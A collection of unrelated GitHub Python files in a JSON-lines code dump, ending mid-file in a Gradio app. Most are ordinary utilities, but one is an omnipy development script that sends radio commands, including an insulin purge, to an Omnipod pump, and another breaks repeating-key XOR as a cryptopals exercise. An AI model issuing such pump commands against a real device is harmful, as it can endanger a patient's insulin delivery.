re.compile(r'[1-4,一,二,三,四]季')\n annual_detector = re.compile(r'年[度,报]')\n mid_detector = re.compile(r'(半年|中期)')\n month_detector = re.compile(r'年[0-9,一,二,三,四,五,六,七,八,九,十]{1,2}月')\n \n for file in code_file_list:\n if '摘要' in file: continue\n \n single_report_info_df = pd.DataFrame(columns = ['file_name','report_type', 'year', 'quarter',\n 'date','info','type',\n 'report_year', 'month', 'day'])\n single_report_info_df.loc[0,'file_name'] = file\n \n report_date = file.split('_')[1].split('.')[0]\n single_report_info_df.loc[0,'date'] = report_date\n single_report_info_df.loc[0,['report_year', 'month', 'day']] = [int(num) for num in report_date.split('-')]\n \n title = file\n year = re.findall(year_detector, title)\n quarter = re.findall(quarter_detector, title)\n annual = re.findall(annual_detector, title)\n mid = re.findall(mid_detector, title)\n month = re.findall(month_detector, title)\n \n if len(year) > 0:\n single_report_info_df['year'] = num_cn2eng(year[0][:-1])\n if len(quarter) > 0:\n quarter = num_cn2eng(quarter[0][0])\n \n single_report_info_df['report_type'] = 'Q'\n single_report_info_df['quarter'] = quarter\n \n if len(mid) > 0:\n single_report_info_df['report_type'] = 'H'\n single_report_info_df['quarter'] = '5'\n elif len(annual) > 0:\n single_report_info_df['report_type'] = 'A'\n single_report_info_df['quarter'] = '6'\n elif len(month) > 0:\n month = num_cn2eng(month[0][1:-1])\n \n single_report_info_df['report_type'] = 'M'\n single_report_info_df['quarter'] = num_cn2eng(month)\n \n if len(single_report_info_df) > 0:\n try:\n single_report_info_df.loc[0,'info'] = '-'.join([single_report_info_df['report_type'].values[0],\n single_report_info_df['year'].values[0],\n single_report_info_df['quarter'].values[0]])\n except: pass\n single_report_info_df.loc[0,'type'] = get_type(single_report_info_df['report_type'].values[0])\n report_info_df = pd.concat([report_info_df, single_report_info_df], axis = 0)\n \n \n report_info_df = report_info_df.reset_index(drop = True)\n \n if len(report_info_df) == 0: return report_info_df\n \n basic_info_df = pd.concat([self.code_info_dict[code]]*len(report_info_df), ignore_index = True,axis = 1).transpose()\n output = pd.concat([basic_info_df, report_info_df], axis = 1)\n output = output.sort_values(['report_year','month','day'])\n return output\n \n def process_code_list(self, code_list: list):\n aggregate_info = pd.DataFrame()\n for code in tqdm(code_list):\n code_info_df = self.process_single_code_info(code)\n if len(code_info_df) > 0:\n aggregate_info = pd.concat([aggregate_info, code_info_df])\n \n output = aggregate_info.reset_index(drop = True)\n return(output)\n \n def threading(self, jobs: int):\n code_list = self.code_list\n \n num_per_job = int(len(code_list) / jobs)\n code_list_cut = []\n for i in range(jobs):\n if i != jobs - 1:\n code_list_cut.append(code_list[i * num_per_job: (i + 1) * num_per_job])\n else:\n code_list_cut.append(code_list[i * num_per_job:])\n \n def multi_run(sub_code_list):\n sub_info_df = self.process_code_list(sub_code_list)\n return sub_info_df\n \n output = Parallel(n_jobs=jobs, verbose=1)(delayed(multi_run)(sub_list) for sub_list in code_list_cut)\n return output\n \n \nif __name__ == \"__main__\":\n code_info_dict_path = 'C:/Users/niccolo/Desktop/QLFtask/eastmoney/word_freq/raw_data/FundCode.csv'\n all_file_path = 'F:/eastmoney/SupFiles' \n save_path = 'C:/Users/niccolo/Desktop/QLFtask/eastmoney/word_freq/tables/comp_panel.xlsx'\n \n # code_info_dict_path = '/home/users/michaelfan/data/ConfCall/eastmoney/word_freq/FundCode.xlsx'\n # all_file_path = '/home/users/michaelfan/data/ConfCall/eastmoney/FullTexts'\n # save_path = '/home/users/michaelfan/data/ConfCall/eastmoney/word_freq/panel.xlsx'\n \n extractor = panel_info_extractor(code_info_dict_path, all_file_path)\n \n threading_results = extractor.threading(2)\n # test = extractor.process_code_list(extractor.code_list)\n # test = extractor.process_single_code_info('000001')\n \n final_df = pd.DataFrame()\n for df in threading_results:\n final_df = pd.concat([final_df, df])\n \n final_df.to_excel(save_path, index = False, encoding = 'gbk')\n\n \n \n ","repo_name":"GotoRyusuke/ChineseFundReports","sub_path":"word freq/extract_full_panel.py","file_name":"extract_full_panel.py","file_ext":"py","file_size_in_byte":7311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70515812269","text":"from django.urls import re_path\nfrom .views import (TracksList, CreateTrack, EditTrack, DeleteTrack, TopicsList,\nAddTopic, EditTopic, DeleteTopic, TopicDetails, TracksProgress, TopicsProgress,\nEditTopicNote)\n\nurlpatterns = [\n re_path(r\"create-track/$\", CreateTrack.as_view(), name='create-track'),\n re_path(r\"(?P[-\\w]+)/edit/$\", EditTrack.as_view(), name=\"edit-track\"),\n re_path(r\"(?P[-\\w]+)/delete/$\", DeleteTrack.as_view(), name=\"delete-track\"),\n re_path(r\"(?P[-\\w]+)/topics/$\", TopicsList.as_view(),\n name=\"topics\"),\n re_path(r\"(?P[-\\w]+)/add-topic/$\", AddTopic.as_view(),\n name=\"add-topic\"),\n re_path(r\"(?P[-\\w]+)/tracks-progress/$\", TracksProgress.as_view(),\n name=\"tracks-progress\"),\n\n #this to is topics\n re_path(r\"topics/(?P[-\\w]+)/edit-topic/$\", EditTopic.as_view(),\n name='edit-topic'),\n re_path(r\"topics/(?P[-\\w]+)/edit-note/$\", EditTopicNote.as_view(),\n name='edit-note'),\n re_path(r\"topics/(?P[-\\w]+)/delete-topic/$\", DeleteTopic.as_view(),\n name='delete-topic'),\n re_path(r\"topics/(?P[-\\w]+)/$\", TopicDetails.as_view(),\n name='topic-details'),\n #end topics\n \n re_path(r\"(?P[-\\w]+)/(?P[-\\w]+)/$\",\n TopicsProgress.as_view(), name='topics-progress'),\n re_path(r\"$\", TracksList.as_view(), name=\"tracks-list\")\n]","repo_name":"MAE776569/project-manager","sub_path":"src/tracks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24158242597","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.font import Font\nimport os\nimport re\n\nfrom pytkeditorlib.gui_utils import AutoHideScrollbar as Scrollbar\nfrom pytkeditorlib.utils.constants import CONFIG\nfrom .base_widget import BaseWidget\n\n\nclass Filebrowser(BaseWidget):\n def __init__(self, master, callback, **kw):\n BaseWidget.__init__(self, master, 'File browser', padding=2, **kw)\n self.rowconfigure(1, weight=1)\n self.columnconfigure(0, weight=1)\n\n self.history = []\n self.history_index = -1\n\n self.load_filters()\n # --- browsing buttons\n frame_btn = ttk.Frame(self)\n self.b_up = ttk.Button(frame_btn, image='img_up', padding=0,\n command=self.browse_up)\n self.b_backward = ttk.Button(frame_btn, image='img_left', padding=0,\n command=self.browse_backward)\n self.b_forward = ttk.Button(frame_btn, image='img_right', padding=0,\n command=self.browse_forward)\n self.b_backward.pack(side='left', padx=2)\n self.b_forward.pack(side='left', padx=2)\n self.b_up.pack(side='left', padx=2)\n self.b_forward.state(['disabled'])\n self.b_backward.state(['disabled'])\n\n ttk.Button(frame_btn, image='img_properties', padding=0,\n command=self.edit_filter).pack(side='right', padx=2)\n\n # --- filetree\n self.filetree = ttk.Treeview(self, show='tree', selectmode='none',\n style='flat.Treeview', padding=4)\n self._sx = Scrollbar(self, orient='horizontal', command=self.filetree.xview)\n self._sy = Scrollbar(self, orient='vertical', command=self.filetree.yview)\n\n self.filetree.configure(xscrollcommand=self._sx.set,\n yscrollcommand=self._sy.set)\n\n self.font = Font(self, font=\"TkDefaultFont 9\")\n self.callback = callback\n\n self.filetree.tag_configure('file', image='img_file')\n self.filetree.tag_configure('folder', image='img_folder')\n self.filetree.tag_bind('file', '', self._on_db_click_file)\n self.filetree.tag_bind('folder', '', self._on_db_click_folder)\n self.filetree.tag_bind('folder', '<>', self._on_folder_open)\n\n self.filetree.bind('<1>', self._on_click)\n\n # --- placement\n frame_btn.grid(row=0, columnspan=2, sticky='ew', pady=2)\n self.filetree.grid(row=1, column=0, sticky='ewns')\n self._sx.grid(row=2, column=0, sticky='ew')\n self._sy.grid(row=1, column=1, sticky='ns')\n\n def _on_click(self, event):\n if 'indicator' not in self.filetree.identify_element(event.x, event.y):\n self.filetree.selection_remove(*self.filetree.selection())\n self.filetree.selection_set(self.filetree.identify_row(event.y))\n\n def _on_db_click_file(self, event):\n item = self.filetree.focus()\n if self.callback is not None and item:\n self.callback(item)\n\n def _on_db_click_folder(self, event):\n item = self.filetree.focus()\n if item:\n self.populate(item)\n\n def load_filters(self):\n filters = CONFIG.get('File browser', 'filename_filter',\n fallback='README, *.py, *.rst').split(', ')\n filters = ['^' + ext.strip().replace('.', '\\.').replace('*', '.*') + '$' for ext in filters]\n self.filter = re.compile('|'.join(filters))\n\n def edit_filter(self):\n\n def ok(event=None):\n CONFIG.set('File browser', 'filename_filter', entry.get())\n CONFIG.save()\n self.load_filters()\n self.populate(self.filetree.get_children()[0], history=False)\n top.destroy()\n\n top = tk.Toplevel(self, padx=4, pady=4)\n top.title('Filename filters')\n top.resizable(True, False)\n top.columnconfigure(0, weight=1)\n top.columnconfigure(1, weight=1)\n ttk.Label(top, text='Name filters:').grid(columnspan=2, sticky='w')\n entry = ttk.Entry(top)\n entry.grid(columnspan=2, sticky='ew', pady=4)\n entry.insert(0, CONFIG.get('File browser', 'filename_filter',\n fallback='README, *.py, *.rst'))\n entry.bind('', ok)\n entry.bind('', lambda e: top.destroy())\n entry.focus_set()\n ttk.Button(top, text='Ok', command=ok).grid(row=2, column=0, padx=4, sticky='e')\n ttk.Button(top, text='Cancel',\n command=top.destroy).grid(row=2, column=1, padx=4, sticky='w')\n top.transient(self)\n top.grab_set()\n\n def history_add(self, path):\n self.history_index += 1\n self.history = self.history[:self.history_index]\n self.history.append(path)\n if self.history_index > 0:\n self.b_backward.state(['!disabled'])\n self.b_forward.state(['disabled'])\n\n def browse_up(self):\n path = os.path.dirname(self.filetree.get_children()[0])\n self.populate(path)\n\n def browse_backward(self):\n self.history_index -= 1\n path = self.history[self.history_index]\n self.populate(path, history=False)\n self.b_forward.state(['!disabled'])\n if self.history_index == 0:\n self.b_backward.state(['disabled'])\n\n def browse_forward(self):\n self.history_index += 1\n path = self.history[self.history_index]\n self.populate(path, history=False)\n self.b_backward.state(['!disabled'])\n if self.history_index == len(self.history) - 1:\n self.b_forward.state(['disabled'])\n\n def clear(self, event=None):\n self.filetree.delete(*self.filetree.get_children())\n\n @staticmethod\n def _key_sort_files(item):\n return item.is_file(), item.name.lower()\n\n def _on_folder_open(self, event):\n \"\"\"Display folder content when opened by user.\"\"\"\n item = self.filetree.focus()\n self.filetree.delete(*self.filetree.get_children(item))\n self._lazy_populate(item)\n\n def _lazy_populate(self, path):\n \"\"\"\n Populate file tree of path only to the first level.\n\n Add dummy items inside folders so that they can be expanded but\n display their actual content only if the user opens them.\n \"\"\"\n try:\n content = sorted(os.scandir(path), key=self._key_sort_files)\n except PermissionError:\n return\n for item in content:\n is_dir = item.is_dir()\n ipath = item.path\n name = item.name\n if is_dir:\n if not name[0] == '.':\n self.filetree.insert(path, 'end', ipath, text=name, tags='folder')\n self.filetree.insert(ipath, 'end', text='')\n elif self.filter.search(name):\n self.filetree.insert(path, 'end', ipath, text=name, tags='file')\n\n def populate(self, path, history=True, reset=False):\n self.configure(cursor='watch')\n self.update_idletasks()\n self._sx.timer = self._sx.threshold + 1\n self._sy.timer = self._sy.threshold + 1\n\n self.filetree.delete(*self.filetree.get_children())\n p = os.path.abspath(path)\n self.filetree.insert('', 0, p, text=p, image='img_folder', open=True)\n\n self._lazy_populate(p)\n\n self.configure(cursor='')\n if reset:\n self.history = []\n self.history_index = -1\n if history:\n self.history_add(path)\n","repo_name":"j4321/PyTkEditor","sub_path":"pytkeditorlib/widgets/filebrowser.py","file_name":"filebrowser.py","file_ext":"py","file_size_in_byte":7548,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"42804776617","text":"\r\n\r\n\r\n# Importo los modulos que se comunican directamente con el controlador\r\nfrom tkinter import *\r\nfrom Vista import *\r\nfrom Modelo import *\r\nfrom TopLevelTemas import *\r\n\r\n\r\n# clase donde contengo los metodos a realizar con las distintas acciones de la app\r\nclass miControlador:\r\n\r\n\r\n\t#Llamada a la vista principal\r\n\tdef vistaPrincipalC(self, ):\r\n\t\ttry:\r\n\t\t\tregistros.imagenPrincipal(self,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\t\r\n\t# ventana emergente de temas\r\n\tdef topLevel(self, varOpcion, varOpcion_txt, ):\r\n\r\n\t\ttry:\r\n\t\t\ttopLevel.aparecerBg(self, varOpcion, varOpcion_txt)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\t# opciones de var que vienen de TopLevelTemas.py y que se dirigen a modelo.py para despues en temas.py decidir que tematica aplicar \r\n\tdef temaOpcion(self, varOpcion,):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.eleccionTema(self, varOpcion, self.tituloPrincipal, self.tituloReferencia, self.descripcionReferencia, \r\n\t\t\t\tself.altaBase, self.borrar, self.modificarRegistro, self.temasPrograma, self.accionesMensajes,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\tdef temaOpcion_txt(self, varOpcion_txt,):\r\n\t\ttry:\r\n\t\t\tmiModelo.fuentes_txt(self, varOpcion_txt, self.tituloPrincipal, self.tituloReferencia, self.descripcionReferencia, \r\n\t \tself.altaBase, self.borrar, self.modificarRegistro, self.temasPrograma, self.accionesMensajes,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\t#boton salir app\r\n\tdef salirAplicacion(self, root):\r\n\t\ttry:\r\n\t\t\tmiModelo.salir_app(self, root, )\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\t\t\t\r\n\tdef registroAltas(self, a_val, b_val, accionesMensajes, pantallaPrincipal ):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.agregarRegistro(self, a_val, b_val, accionesMensajes,)\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\t\t\r\n\tdef registroConsultas(self, pantallaPrincipal ):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\tdef registroBorrar(self, pantallaPrincipal, accionesMensajes, ):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.borrarRegistros(self, pantallaPrincipal, accionesMensajes,)\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\tdef registroActualizar(self, pantallaPrincipal, accionesMensajes, a_val, b_val,):\r\n\r\n\t\ttry:\r\n\t\t\tmiModelo.actualizarRegistro(self, pantallaPrincipal, accionesMensajes, a_val, b_val,)\r\n\t\t\tmiModelo.pedirRegistros(self, pantallaPrincipal,)\r\n\t\texcept:\r\n\t\t\tprint(\"Error\")\r\n\t\tfinally:\r\n\t\t\tprint(\"Controlador.py\")\r\n\r\n\r\n#Inicio de la vista apenas inicie el programa\r\nif __name__ == '__main__':\r\n\tobjetoIniciar = miControlador()\r\n\tobjetoIniciar.vistaPrincipalC()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n","repo_name":"franco954/CRUD","sub_path":"Controlador.py","file_name":"Controlador.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19105750030","text":"from handler import Handler\nimport util\nimport random\nimport time\n\nclass Names(Handler):\n\n async def message_handler(self, message, jail, bonkbot):\n for data in self.cf.get(\"people\"):\n if \"|\" in data:\n parts = data.split(\"|\")\n person = parts[0]\n alias = random.choice(parts[1:])\n else:\n person = data\n alias = person\n if person in util.sanitize(message.content):\n await util.send_message(message.channel, random.choice(self.cf.get(\"names\")).replace(\"$\", alias))\n return True\n return False\n","repo_name":"calebclark/bonkbot","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72022071787","text":"from lex import lex, verbose_lex\nfrom AST import parse, verbose_parse\nimport AST as a\nimport interpreter as i\nimport compiler as c\n\nfrom time import time\nimport sys, os, threading, platform, argparse\n\n\ndef set_stack_recursion():\n \"\"\"\n Function that sets recusion limit to 0x1000000 and increases stacksize based on OS\n \"\"\"\n sys.setrecursionlimit(0x1000000)\n if platform.system() == \"Linux\":\n print(\"running on linux stack size: 2gb\\n\")\n threading.stack_size(2147483648) #set stack to 2gb\n else:\n print(\"running on windows stack size: 256mb\\n\")\n threading.stack_size(256000000)\n\n\ndef main():\n \"\"\"\n Main function called if script starts, procceses arguments and starts interpreter/compiler\n \"\"\"\n global parse\n global lex\n parser = argparse.ArgumentParser(description=\"Interpreter & Compiler for scolang-- programming language\")\n parser.add_argument(\"file_name\", type=str, metavar='File name', help=\"the file name that needs to be interpreted or compiled\")\n parser.add_argument('-c','--compile', dest='compile', action='store_true',default=False, help=\"Compile code into Assembly files\")\n parser.add_argument('-b','--build', dest='build', action='store_true',default=False, help=\"Used by PlatformIO build task. no need when manual compiling\")\n parser.add_argument('-i','--interpret',dest='interpret', action='store_true',default=False, help=\"Parse and Run code with interpreter\")\n parser.add_argument('-l','--lex', dest='verbose-lex', action='store_true',default=False, help=\"Run with verbose lexing\")\n parser.add_argument('-p','--parse', dest='verbose-parse', action='store_true',default=False, help=\"Run with verbose parsing\")\n parser.add_argument('-v','--verbose', dest='verbose-all', action='store_true',default=False, help=\"Run with verbose lexing and parsing\")\n parser.add_argument('-s','--stats', dest='statistic', action='store_true',default=False, help=\"Shows time statistics\")\n parser.add_argument('--clean', dest='clean', action='store_true',default=False, help=\"Deletes all *.S files from Platformio/src directory\")\n arguments = vars(parser.parse_args())\n\n set_stack_recursion()\n #check if file exists at ScolangSrc/\n\n if (not os.path.exists(f\"ScolangSrc/{arguments['file_name']}\")):\n raise Exception(\"no file named { %s } at specified path ScolangSrc/\" % f\"{arguments['file_name']}\")\n \n \n #use decorated functions based on verbose flags\n if (arguments['verbose-all'] == True or arguments['verbose-parse'] == True):\n parse = verbose_parse(parse) \n if (arguments['verbose-all'] == True or arguments['verbose-lex'] == True):\n lex = verbose_lex(lex) \n if (arguments['statistic'] == True):\n start_time = time()\n if (arguments['clean'] == True):\n os.popen('find ./PlatformioProject/src -iname \"*.S\" -delete')\n \n\n\n lex_out = lex(arguments['file_name'])\n ast = parse(lex_out)\n \n if (arguments['interpret'] == True):\n i.interpret(ast)\n \n \n if(arguments['statistic']==True):\n print(\"time to run program: %s seconds\" % round(time()-start_time,4))\n\n\n if (arguments['compile'] == True):\n c.mainCompiler(arguments['file_name'].strip(\".sco\"),ast) # removes .sco from filename to avoid hello.sco.S\n\n if (arguments['build'] == True):\n print(\"====================\\nAssembly Files Build\\nReady for tests\\n====================\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"KingPungy/ATP","sub_path":"PlatformioProject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21503957655","text":"from bitstring import BitArray, BitString\nimport base64, math\n\nimport challenge3\n\n# Clipped from https://stackoverflow.com/a/49942785, credit to https://stackoverflow.com/users/1701600/boern\ndef get_bit(value, n):\n return ((value >> n & 1) != 0)\n# End clipped code\n\ndef count_bits(num):\n count = 0\n for i in range(0, 8):\n if get_bit(num, i):\n count+=1\n return count\n\ndef hamming_distance(bs1, bs2):\n sum = 0\n for i in range(0, len(bs1)):\n sum+=count_bits(bs1[i]^bs2[i])\n return sum\n\ndef solve_multi_xor(b64encoded_ciphertext):\n\n # get ciphertext in byte form\n b64_bytestring = b64encoded_ciphertext.encode(\"ascii\")\n b64bytes = base64.b64decode(b64_bytestring)\n hamming_distances = {}\n for keysize in range(2,40):\n #hamming_distances[hamming_distance(b64bytes[0:keysize], b64bytes[keysize:keysize+keysize])*1.0/keysize] = keysize\n hamming_distances[sum([hamming_distance(b64bytes[keysize*i:keysize*(i+1)],b64bytes[keysize*(i+1):keysize*(i+2)]) for i in range(0,60)])/(60.0*keysize)] = keysize\n \n likely_key_size = hamming_distances[min(hamming_distances.keys())]\n\n #chunk the ciphertext into `likely_key_size` blocks with parity\n chunks = []\n for i in range(0,likely_key_size):\n chunks.append([])\n for j in range(0+i, len(b64bytes), likely_key_size):\n chunks[i].append(b64bytes[j])\n key = \"\"\n for i in range(0, len(chunks)):\n key+=chr(int(challenge3.freq_analysis_get_key(\"\".join([hex(chunks[i][j])[2:4] if len(hex(chunks[i][j])) == 4 else \"0\"+hex(chunks[i][j])[2:3] for j in range(0, len(chunks[i]))]))[0],16))\n return key\n \n\nf = open(\"/Users/jacobhammontree/Projects/cryptopals/set1//challenge6.data\", \"r\")\nb64 = f.read().replace(\"\\n\",\"\")\nf.close()\nkey = solve_multi_xor(b64)\nprint(key)","repo_name":"jacobhammontree/cryptopals","sub_path":"challenges/challenge6.py","file_name":"challenge6.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1097918939","text":"adjList={\"A\":[\"B\",\"C\"], \"B\":[\"D\", \"E\"], \"C\":[\"B\", \"F\"], \"D\":[], \"E\":[\"F\"], \"F\":[] }\r\n\r\n\r\ncolor={}\r\nparent={}\r\ntravTime={}\r\nop=[]\r\n\r\nfor node in adjList.keys():\r\n color[node]=\"W\"\r\n parent[node]=None\r\n travTime[node]=[-1, -1]\r\n\r\ntime=0\r\n\r\ndef dfsUtil(u):\r\n global time\r\n color[u]=\"G\"\r\n travTime[u][0]=time\r\n op.append(u)\r\n time+=1\r\n\r\n for v in adjList[u]:\r\n if color[v]==\"W\":\r\n parent[v]=u\r\n dfsUtil(v)\r\n \r\n color[u]=\"B\"\r\n travTime[u][1]=time\r\n time+=1\r\n\r\nfor u in adjList.keys():\r\n if color[u]==\"W\":\r\n dfsUtil(u)\r\n\r\nprint(op)\r\nprint(color)\r\nprint(travTime)\r\n\r\n","repo_name":"NirajPatel07/Data-Structures-Python","sub_path":"Graph/Graph DFS Traversal.py","file_name":"Graph DFS Traversal.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11106359836","text":"# ^_^ coding: utf-8\n\n\ndef input_log_tofile(filename):\n while True:\n mes1 = input(\"请输入文件内容,exit或者quit退出: \")\n if mes1 in (\"exit\", \"quit\"):\n with open(filename, \"r\", encoding=\"utf-8\") as fp1:\n for buf in fp1.readlines():\n print(buf, end=\"\")\n break\n else:\n with open(filename, \"a\", encoding=\"utf-8\") as fp:\n fp.write(mes1 + \"\\n\")\n return True\n\nif __name__ == \"__main__\":\n input_log_tofile(\"input.log\")\n","repo_name":"rocky-wang/learnPy3","sub_path":"classroom/homework/base/file_ops.py","file_name":"file_ops.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8273967383","text":"import facebook\r\nimport fb\r\nimport json\r\nimport instapy_cli\r\nfrom datetime import datetime, timedelta, date\r\nfrom threading import Timer\r\n#import pynew2\r\n\r\ndef hello_world():\r\n graph=facebook.GraphAPI(access_token=\"\")\r\n msg=graph.put_object(parent_object='me',connection_name='feed',message='test message')\r\n print(msg)\r\n \r\ndef kl():\r\n print(\"hi\")\r\n\r\nif __name__==\"__main__\":\r\n x=datetime.today()\r\n y = x.replace(day=x.day, hour=3, minute=45, second=45, microsecond=0)\r\n # + timedelta(days=1)\r\n delta_t=y-x\r\n\r\n secs=delta_t.total_seconds()\r\n print(date.today())\r\n #hello_world()\r\n\r\n t = Timer(secs, kl)\r\n t.start()","repo_name":"parinavcodes/Automate-your-Social-Media","sub_path":"api_soc_poster.py","file_name":"api_soc_poster.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3505813417","text":"from podcomm.protocol_common import PdmMessage, PdmRequest, PodMessage, PodResponse\nfrom podcomm.protocol import *\nfrom podcomm.nonce import Nonce\nfrom podcomm.protocol_radio import PdmRadio, RadioPacket, RadioPacketType, TxPower\nfrom podcomm.crc import crc16, crc8\nfrom tests.mock_radio import MockPacketRadio\nfrom podcomm.pod import Pod\n\nimport time\n\npod = Pod()\npod.radio_address = 0x1f010101\nrd = PdmRadio(0x1f010101, 11, 11)\npod.id_t = 0x0007a75c\npod.id_lot = 0x0000ad89\n\nnonce = Nonce(pod.id_lot, pod.id_t, None, 0)\n#nonce.reset()\n# msg = request_assign_address(pod.radio_address)\n# rsp = rd.send_message_get_message(msg, ack_address_override=pod.radio_address, tx_power=TxPower.Lowest)\n# response_parse(rsp, pod)\n#\n# msg = request_setup_pod(pod.id_lot, pod.id_t, pod.radio_address, 2019, 5, 28, 21, 8)\n# rsp = rd.send_message_get_message(msg, ack_address_override=pod.radio_address)\n# response_parse(rsp, pod)\n\n# print(pod)\n# exit(0)\n\n#########################################\n\n# msg = request_set_low_reservoir_alert(Decimal(\"30\"))\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n\nmsg = request_set_generic_alert(15, 15)\nmsg.set_nonce(nonce.getNext())\nrsp = rd.send_message_get_message(msg)\nsync_word = response_parse(rsp, pod)\n\nnonce.sync(sync_word, msg.sequence)\n\n\nrd.message_sequence = msg.sequence\n\n\nmsg = request_set_generic_alert(15, 15)\nmsg.set_nonce(nonce.getNext())\nrsp = rd.send_message_get_message(msg)\nresponse_parse(rsp, pod)\n\n\nmsg = request_purge_insulin(Decimal(\"2.60\"))\nmsg.set_nonce(nonce.getNext())\nrsp = rd.send_message_get_message(msg)\nresponse_parse(rsp, pod)\n\n#\n# pm = request_set_pod_expiry_alert((24 * 60 * 2) + (20 * 60))\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n# schedule = [Decimal(\"1.0\")*48]\n# pm = request_set_basal_schedule(schedule, 0, 0, 0)\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n# pm = request_purge_insulin(Decimal(\"0.50\"))\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n# pm = request_status()\n# rsp = rd.send_message_get_message(msg)\n# response_parse(rsp, pod)\n#\n\ntime.sleep(15)\n\nmsg = request_status()\nrsp = rd.send_message_get_message(msg)\n\nprint(pod)\nexit(0)\n","repo_name":"winemug/omnipy","sub_path":"tests/dev2.py","file_name":"dev2.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"37"} +{"seq_id":"21538674864","text":"print(\"Ecuacion del tipo ax + b =0\")\na = 0\nb = 0\nresultado = 0\na = int(input(\"Ingrese a :\"))\nb = int(input(\"Ingrese b :\"))\n\nif a != 0:\n resultado = (-b/a)\n print(f\"El resultado de {a}x + {b} = 0 es que x = {resultado}\")\nelse :\n if a == 0:\n if b != 0:\n print(\"La ecuacion no tiene solucion\")\n else:\n print(\"La ecuacion tiene infinitas soluciones\")\n else:\n print(\"La ecuacion tiene infinitas soluciones\")\n","repo_name":"luisfelipe7799/Proyectos_Python_1","sub_path":"Ejercicios Estructuras repetitivas/Ecuación de Primer Grado.py","file_name":"Ecuación de Primer Grado.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2594764126","text":"\r\n\r\ndef countByFives(target):\r\n for i in range(5,target + 1,5):\r\n print(i)\r\n return\r\n \r\n \r\ndef sumFrom(target):\r\n sum = 0 \r\n for i in range(target + 1):\r\n sum = sum + i\r\n \r\n return sum\r\n\r\n\r\ndef countVowels(string):\r\n vowelSum = 0\r\n for i in range(len(string)):\r\n if string[i] in \"AEIOUaeiou\":\r\n vowelSum = vowelSum + 1\r\n return vowelSum\r\n\r\n\r\ndef countDigits(string):\r\n digitSum = 0\r\n for char in string:\r\n if char.isdigit():\r\n digitSum = digitSum + 1\r\n return digitSum\r\n\r\nprint(countDigits(\"Wow101Wow\"))\r\n\r\n","repo_name":"WillSchick/CS111-Coursework","sub_path":"Z) Exercises/WEEK6/forLoopModule.py","file_name":"forLoopModule.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14888327746","text":"import gradio as gr\nfrom utils import search_db,get_markdown\n\nwith gr.Blocks() as demo:\n gr.Markdown(\"# Lynx\\n\\n[GitHub](https://github.com/ChadDa3mon/lynx/tree/main)\") \n with gr.Tab(\"Add Bookmark\"):\n with gr.Row():\n add_url = gr.Textbox(label=\"URL 